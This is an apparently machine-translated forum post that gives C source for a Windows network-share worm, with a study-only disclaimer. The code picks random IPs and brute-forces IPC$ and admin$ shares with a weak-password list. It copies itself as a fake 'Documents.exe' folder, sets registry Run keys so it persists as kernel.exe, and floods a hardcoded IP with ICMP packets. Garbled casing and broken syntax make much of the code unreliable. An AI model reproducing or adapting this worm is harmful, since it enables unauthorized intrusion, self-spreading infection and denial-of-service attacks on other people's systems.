DIY: a simple network-share worm

xiaoxiao2021-03-06  116

DIY: a simple network-share worm

/ * WRITEBY: LOND8QQ: 104154682003.2 Declaration: I wrote this as a learning exercise. Please use it only for study and testing and do not spread it on the Internet; otherwise, I and the Chongqing Black League bear no responsibility for anything it causes. This worm is relatively simple: it spreads mainly by scanning for weak passwords and shared resources, and it disguises itself as a folder. When someone runs it, it copies itself to kernel.exe in the system directory and modifies the registry, so that at the next boot kernel.exe runs automatically and goes on to infect other machines. The principle is simple. The program runs in console mode while debugging; all the _tprintf calls are debugging output, which the WinMain (non-console) build does not need. There is no self-protection part, so it is easily killed. The protection part is more troublesome: I made an attempt but did not succeed, and with little time I could not find the error, so I will leave it for now. :) If any experts are interested or have good ideas, let's study together! (My QQ is above.) Because it has no self-protection, this is a failed worm, and I estimate it will not spread widely. Because viruses do spread online, I did not dare to test it in the wild; I only confirmed the expected behavior on this machine and in a virtual machine.

The code is as follows: (now ugly) * / # Define unicode # define _unicode # include "winsock2.h" #include #include "windows.h" #include "stdio.h" #include "lm.h "#include" tchar.h "#pragma comment (lib," ws2_32 ") # Pragma Comment (lib," mpr ") # Pragma Comment (lib," netapi32 ") typef struct _iHDR {byte i_type; // 8-bit type Byte i_code; // 8-bit code ushort i_cksum; // 16-bit check and usort i_id; // identifier number ushort i_seq; // message serial number Ulong timestamp; // Timestamp} ICMP_HEPEDEF STRUCT {Int size; SockAddr_in attack; char * buf; socket s;} Netinfor; // Used to pass the basic information of the Attack function TCHAR * DESIP = _t ("209.67.3.106"); // The target of attack can be the White House :) Bool Callback getUserList (Tchar * Server, Tchar Name [50]; Bool Callback Connectremote (Bool, Tchar *, Tchar *, Tchar *, Tchar *); Void Callback Randomip (Tchar * RIP); DWORD Callback Spread (LPVOID); Bool Callback GetSouces (Tchar * Server, Tchar Souce [20]); Void Callback Upfile (Tchar * RIP, Tchar * Name, Tchar * Pass, Tchar Souce [15] [20]); DWORD WINAPI Attack (LPVOID) ; Ushort checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {CKS Um = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} cksum = (cksum >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSum) >> 16); Return (~ CKSUM);} DWORD WINAPI SPREAD (LPVOID) // Dissemination If the password is detected to upload virus {Tchar Password [15] [15] = {_ T (""), _ T ( "ASDF"), _ T ("123456789"), _ T ("666888"), _ t ("HACKER"), _ T ("Hello"), _ T ("password"), _ t (" 123456 "), _ T (" 111 "), _ t (" administrator "), _ t (" admin "), _ t (" system "), _ t (" windows "), _ t (" 123321 ")};

// A built-in dictionary can expand while (TRUE) {tchar rip [50] = _ t (""); tchar name [30] = _ t ("); tchar pass [15] = _ t (")); TCHAR Username [50] [30] = {0}; tchar Souce [15] [20] = {0}; Randomip (RIP); NetResource NR; DWORD RET; TCHAR IPC [100] = _ T (""); SWPrintf (IPC, _T ("% s // IPC $"), RIP); nr.lplocalname = null; nr.lpprovider = null; nr.dwtype = resourcety_any; nr.lpremotename = IPC; RET = WNETADDCONNECTION2 (& NR, Pass, Name, 0); if (RET! = Error_Success) {Printf ("/ NIPC $ Connect Failed./N "; computerlist (RIP, Username) && getSouces (RIP, Souce) {RET = WnetCancelConnection2 (IPC, 0, TRUE); if (RET! = Error_Success) {_tprintf (_T ("IPC $ Disconnect Failed./N")); // Return -1;} Bool ISOK = FALSE; INT K = 0; int i; for (i = 0; username [0]! = 0; i ) {_ tprintf (_T ("/ n next username!"); while (k <15) IF (True, Rip, Username, Password [k], _ t ("admin $"))) {isok = true; wcscpy (name, username); wcscpy (pass, password [k]); Connectremote (False, Rip, Username, Password [K], _ T ( "Admin $")); goto spreadsuccess;} else K ; IF (Connectremote, Username, USE RNAME, _T ("admin $"))) {isok = true; wcscpy (name, username); wcscpy (pass, username); Connectremote (false, rip, username, username, _t ("admin $"); goto Spreadsuccess;}}} {Upfile (RIP, Name, Pass, Souce);}} else WnetCancelConnection2 (IPC, 0, True); Sleep (10);}} // ======= =================================================

======= BOOL CALLBACK ConnectRemote (BOOL bConnect, TCHAR * lpHost, TCHAR * lpUserName, TCHAR * lpPassword, TCHAR * lpSouce) {TCHAR lpIPC [256] = {0}; DWORD dwErrorCode; NETRESOURCE NetResource; swprintf (lpIPC , _T ( "% s //% s"), lpHost, lpSouce); NetResource.lpLocalName = NULL; NetResource.lpRemoteName = lpIPC; NetResource.dwType = RESOURCETYPE_ANY; NetResource.lpProvider = NULL; if (wcsicmp (lpPassword, _T! ("Null"))) {lppassword = null;} if (bconnect) {_tprintf (_t ("now connecting ...")); while (1) {dwerrorcode = wnetdConnection2 (& NetResource, lppassword, lpusername, 0); if ((dwErrorCode == ERROR_ALREADY_ASSIGNED) || (dwErrorCode == ERROR_DEVICE_ALREADY_REMEMBERED)) {WNetCancelConnection2 (lpIPC, 0, TRUE);} else if (dwErrorCode == NO_ERROR) {_tprintf (_T ( "! Success / n" )); Break;} else {_tprintf (_T ("failure! / N")); return false;} Sleep (10);} } Else {_tprintf (_t ("now disconnecting ..."); dwerrorcode = wnetcancelconnection2 (lpipc, 0, true); if (dwerrorcode == no_ERROR) {_tprintf (_t ("success! / N"));} Else {_tprintf (_T ("failure! / n")); return false;}} return true;} Bool Callback getUserList (tchar * server, tchar name [50] [30]) // obtain user list {PNET_DISPLAY_USER PBUF, PBUFFER; DWORD NSTATUS; DWORD DWREC; DWORD I = 0; DWORD LERROR; DWORD DWLEVEL; INT NUM = 0; dWlevel = 1; // wchar_t wpchar [30] = {0};

// MultibyTetowideChar (CP_ACP, 0, Server, -1, WPChar, 30); // WPrintf (WPCHAR); Printf ("/ n ******* / n"); do {nStatus = NetQueryDisplayInformation (server, dwLevel, i, 100,0xFFFFFFFF, & dwRec, (PVOID *) & pBuf); if ((nStatus == ERROR_SUCCESS) || (nStatus == ERROR_MORE_DATA)) {pBuffer = pBuf; for (; DWREC> 0; dwrec -) {// char bufname [30] = {0}; // widechartomultibyte (cp_maccp, 0, pbuffer-> usri1_name, -1, bufname, 30, null, null); if (Num < 50) {Memcpy (Name [Num], PBuffer-> USRI1_NAME, WCSLEN (PBuffer-> USRI1_NAME) * SIZEOF (TCHAR)); Num ;} else goto userfuncept; _tprintf (_t (_t ("/ nname: / t% s "), Name [num-1]); i = pBuffer-> usri1_next_index; pBuffer ;}} else {lerror = getLastError (); if (lerror == 997) {_tprintf (_t (" / ngetuserlist: / t / toverlapped I / O Operation IS in Progress./N ")); Return False;} else {_tprintf (_t (" / ngetuserlist error: / t% d / n "), lerror); return false;}} UserfunceXit: IF PBUF! = null) { Netapibufferfree (PBUF);}}}} while (NSTATUS == Error_More_Data); Return True;} Void Callback Randomip (TCHAR * RIP) // Generate a random IP {UNSIGNED Long H = gettickcount () * 198288; char * p; p = INET_NTOA (* (Struct In_addr *) & H); MultibyToWideChar (CP_ACP, 0, P, -1, RIP, 50); _ TPrintf (_T ("% s"), RIP);} Bool Callback getsouces (tchar * server, tchar Souce [15]] // Get a remote shared resource {dWord Er = 0, Tr = 0, Resume = 0; DWORD I, DWLEVEL; PSHARE_INFO_1 PBUF, PBuffer; Net_API_Status Nstatus; DWORD LERROR; INT NUM = 0; dwlevel = 1; _tprintf (_t ("/ n ****** Netbios ****** / n")); do {nstatus =

NetShareEnum (server, dwLevel, (PBYTE *) & pBuf, MAX_PREFERRED_LENGTH, & er, & tr, & resume); if ((nStatus == ERROR_SUCCESS) || (nStatus == ERROR_MORE_DATA)) {pBuffer = pBuf; for (i = 0; i = 15) Goto EXITGETSOUCE; if (PBuffer-> Shi1_Type == STYPE_DISKTREE) {WCSCPY (Souce [Num ], PBuffer-> Shi1_NetName); _ TPrintf ("Name:% s / n "), Souce [NUM-1]); _tprintf (_T (" Disk Drive./N ")));} else if (PBuffer-> Shi1_Type == STYPE_PRINTQ) {_tprintf (_T (" Print Queue./N " ));} Else if (pBuffer-> shi1_type == style_device) {_tprintf (_T ("Communication Device./N"));} else if (PBuffer-> Shi1_Type == STYPE_IPC) {_tprintf (_t ("InterProcess Communication (IPC) ./ n "));} else if (pBuffer-> shi1_type == stype_special) {wcscpy (Souce [Num ], PBuffer-> shi1_netname); _ TPrintf (_t (" name:% s / n "), Souce [NUM-1]); _tprintf (_T ("Special Share Reserved for InterProcess Communication OR Remote administration of the server (admin $) ./ n "));} else {_tprintf (_t (" / n "));} PBuffer ;}} else {lerror = getLastError (); if (lerror == 997) {_t ("/ nnetbios: / Toverlapped I / O Operation is in propress./n") );return false;} else {_tprintf (_t (" / nnetbios error: / t% d / n "), Lerror Return False;}}}} EXITGETSOUCE: IF (PBUF! = null) {NetapibufferFree (PBUF);}} while (nstatus ==

ERROR_MORE_DATA); RETURN TRUE;} Void Callback Upfile (Tchar * RIP, TCHAR * NAME, TCHAR * Pass, Tchar Souce [15] [20]) // On each shared folder, the virus virus disguise into folder, name Documents .exe {TCHAR lpCurrentPath [MAX_PATH] = {0}; TCHAR lpSystemPath [MAX_PATH] = {0}; int i; GetSystemDirectory (lpSystemPath, MAX_PATH); wcscat (lpCurrentPath, lpSystemPath); _ tprintf (_T ( "% s"), Lpsystempath; wcscat (lpCurrentPath, _T ("// kernel.exe")); _ TPrintf (_t ("/ n% s"), lpcurrentpath); for (i = 0; i <15 && souce [0]! = 0; i ) {IF (ConnectRemote (True, RIP, Name, Pass, Souce) {tchar lpremoteexepath [MAX_PATH] = {0}; swprintf (lpremoteexepath, _t ("% s //% s // Documents.exe" ), Rip, soce; copyfile (lpcurrentpath, false); if (! WCSCMP (Souce, _T ("admin $"))) {MEMSET (LPREMoteexepath, 0, Wcslen (lpRemoteexepath) * sizeof (tchar)); SWPRINTF (LPREMOTEEXEPATH, _T ("% s //% s /////////////////////////////////////////////////////////////////////////////////////////> (LpCurrentPath, LPREMOTEEXEPATH, FALSE);} ConnectRemote (False, RIP, Name, Pass, Souce);}}} void WinAPI ModifyReg () // Modify Registry {Tchar lpsystemPath [MAX_PATH] = {0}; tchar lpcurrentpath [MAX_PATH] = {0}; getSyst Emdirectory (LpsystemPath, Max_Path); WCSCAT (LPSystemPath, _T ("// kernel.exe"); tchar * lpvalueename = _t ("Software // Microsoft // Windows // CurrentVersion // Run //"); RegSetValue HKEY_LOCAL_MACHINE, lpValueName, REG_SZ, lpSystemPath, wcslen (lpSystemPath) * sizeof (TCHAR)); TCHAR * lpSunkey = _T ( "SOFTWARE // Microsoft // Windows // CurrentVersion // RunServices //"); RegSetValue (HKEY_LOCAL_MACHINE, lpSunkey, REG_SZ, lpSystemPath, wcslen (lpSystemPath) * sizeof (TCHAR)); GetModuleFileName (NULL, lpCurrentPath, MAX_PATH); wprintf (lpCurrentPath); CopyFile (lpCurrentPath, lpSystemPath, FALSE);} DWORD WINAPI Attack (LPVOID lp) // the object IP Send ICMP FLOOD {Socket Sock;

CHAR * ACKBUF; INCKADDR_IN Attack; Int size; Netinfor * P = (Netinfor *) LP; SOCK = P-> S; Ackbuf = P-> BUF; Size = P-> Size; Memcpy (& Attack, & P-> Attack, SIZEOF (Attack); DWORD ERRORCODE = 0; While (True) {for (int counter = 0; counter <1024; counter ) errorcode = sendto (Sock, Ackbuf, Size, 0, (Struct Sockaddr *) & attck, sizeof attack)); Sleep (5);} return 0;} int WINAPI WinMain (hINSTANCE hInstance, hINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {WSADATA WSAData; SOCKET sock = NULL; SOCKADDR_IN attack; BOOL flag = TRUE; DWORD ErrorCode = 0; ICMP_HEADER ICMP_HEADER; MEMSET (& ICMP_HEADER, 0, SIZEOF (ICMP_HEADER)); if (WSAStartup (MakeWord (2, 2), & WSADATA! = 0) {Return 0;} IF (((Sock = WSASASOCKET (AF_INET, SOCKT (RAW, IPPROTO_ICMP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {// MessageBox (NULL, _T ( "sock false"), NULL, NULL);} int TimeOut = 2000; ErrorCode = setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, ( Char *) & Timeout, SizeOf (Timeout)); if (ErrorCode == Socket_ERROR) {// MessageBox (Null, _T ("ICMP false"), null, null;} CHAR CP [30] = {0}; WideChartomultibyte (CP_MACCP , 0, desip, -1, cp, 30, null, null; attack.sin_family = af_INET; attack.sin_addr.s_un.s_addr = inet_addr (cp); ICMP_Header.i_Type = 8; ICMP_Header.i_code = 0; ICMP_HEADER. i_cksum = 0; icmp_header.i_id = 2; icmp_header.timestamp = GetTickCount (); icmp_header.i_seq = 888; CHAR AckBuf [100] = {0}; memcpy (AckBuf, & icmp_header, sizeof (icmp_header)); memset (AckBuf sizeof (icmp_header), 'A', 20); icmp_header.i_cksum = checksum ((USHORT *) AckBuf, sizeof (icmp_header) 20); int datasize = sizeof (icmp_header) 20; memcpy (AckBuf, & icmp_header, sizeof ( ICMP_HEADER);

